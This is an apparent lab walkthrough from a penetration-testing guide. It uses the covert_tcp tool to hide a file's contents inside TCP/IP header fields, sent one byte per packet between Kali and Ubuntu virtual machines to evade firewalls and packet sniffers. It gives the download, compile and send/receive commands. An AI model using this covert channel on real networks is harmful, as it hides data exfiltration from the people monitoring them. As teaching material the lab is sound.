Network-Servers-Penetration-Guides-and-Tools

Covert Channels using Cover_TCP

This program manipulates the TCP/IP header to transfer a file one byte at a time to a destination host.

Networks use network access control permissions to permit/deny the traffic through them. Tunneling is used to bypass the access control rules of firewalls, IDS, IPS, web proxies to allow certain traffic. Covert channels can be made by inserting data into unused fields of protocol headers. There are many unused or misued fields in TCP or IP over which data can be sent to bypass firewalls.

Covert_TCP

Covert_TCP manipulates the TCP/IP header of the data packets to send a file one byte at a time from any host to a destination. It can act like a server as well as a client and can be used to hide the data transmitted insied a IP header. This is useful when bypassing firewalls and sending data with legitimate looking packets that contain no data for sniffers to analyze.

Objectives

• How to carry covert traffic inside of unused fields of TCP and IP headers.

Requisites

• Windows Server 2016/2012 virtual machine.
• Kali Linux virtual machine.
• Ubuntu Linux virtual machine.

---

Make a Secret Message File

In the Kali Linux, launch a new Terminal window.

1. Create a folder named send on your Desktop, and navigate into it:
   cd Desktop
mkdir send
cd send

2. Create a text file called message.txt inside send folder containing the string: Secret Message!
   echo "Secret Message!" > message.txt

Compile convert_tcp

1. Download the covert_tcp.c file on the send folder:
   wget https://raw.githubusercontent.com/cudeso/security-tools/master/networktools/covert/covert_tcp.c

2. Compile the convert_tcp.c file:
   cc -o covert_tcp covert_tcp.c
   
   

Make a Receiving Destination

1. Go to your Ubuntu and open a new Terminal window.

2. Switch to super-user access: sudo su

3. Start the tcpdump as shown below:
   tcpdump -nvvX port 8888 -i lo
   
   

4. Leave the tcpdump listener running and open another Terminal window or tab.

5. Go to Desktop and create a folder named receive and navigate into it:
   cd Desktop
mkdir receive
cd receive

6. Download the covert_tcp.c file on the receive folder:
   wget https://raw.githubusercontent.com/cudeso/security-tools/master/networktools/covert/covert_tcp.c

7. Compile the convert_tcp.c file:
   cc -o covert_tcp covert_tcp.c
   
   Note: In case you got some errors about cc command, install the compiler: sudo apt install gcc

Setup a Listener

1. Start the Listener [Dest=Ubuntu, Source=Kali]:
   ./covert_tcp -dest 10.0.2.46 -source 10.0.2.42 -source_port 9999 -dest_port 8888 -server -file /home/s4msepi0l/Desktop/receive/receive.txt
   
   

Launch Wireshark on Kali

1. Go back to Kali and Launch the Wireshark.
   

2. Start the Wireshark capturing, double click on your primary network interface item:
   

Start Sending the Secret Message

1. Minimize the Wireshark and open a new Terminal window on your Kali, navigate to the send folder.
2. Start sending the contents of message.txt file over TCP.
   /covert_tcp -dest 10.0.2.46 -source 10.0.2.42 -source_port 8888 -dest_port 9999 -file /root/Desktop/send/message.txt
   
   
   Covert_tcp starts sending the string one character at a time as shown above.
   If you switch to the termina window in Ubuntu, you will see the message beign received:
   
   

Analyze the Results

1. On your Ubuntu machine, stop the tcpdump pressing Ctrl+C as shown below:
   
   Tcpdump shows that no packets were captured in the network.

2. Navigate to /Desktop/receive/ and double-click the receive.txt file to view its contents. You will see the full message saved in the file as shown below:
   
   

3. Switch back to the Kali and Stop the packet capturing on the Wireshark by clicking on the top-left red switch.

4. Click on Apply a display filter field and type tcp to view only the TCP packets as show below:
   
   

If you examine the communication between Ubuntu and Kali (10.0.2.46 - 10.0.2.42) you will find each character of the message string being sent as individual packets over the network show on the next screenshots:

Covert_tcp changes the header of the TCP packets and replaces it with the characters of the string one character at a time to send the message without being detected.

Packet 1, string: S

Packet 2, string: e

Packet 3, string: c

Packet 4, string: r

(…) And so on until the entire message was completed.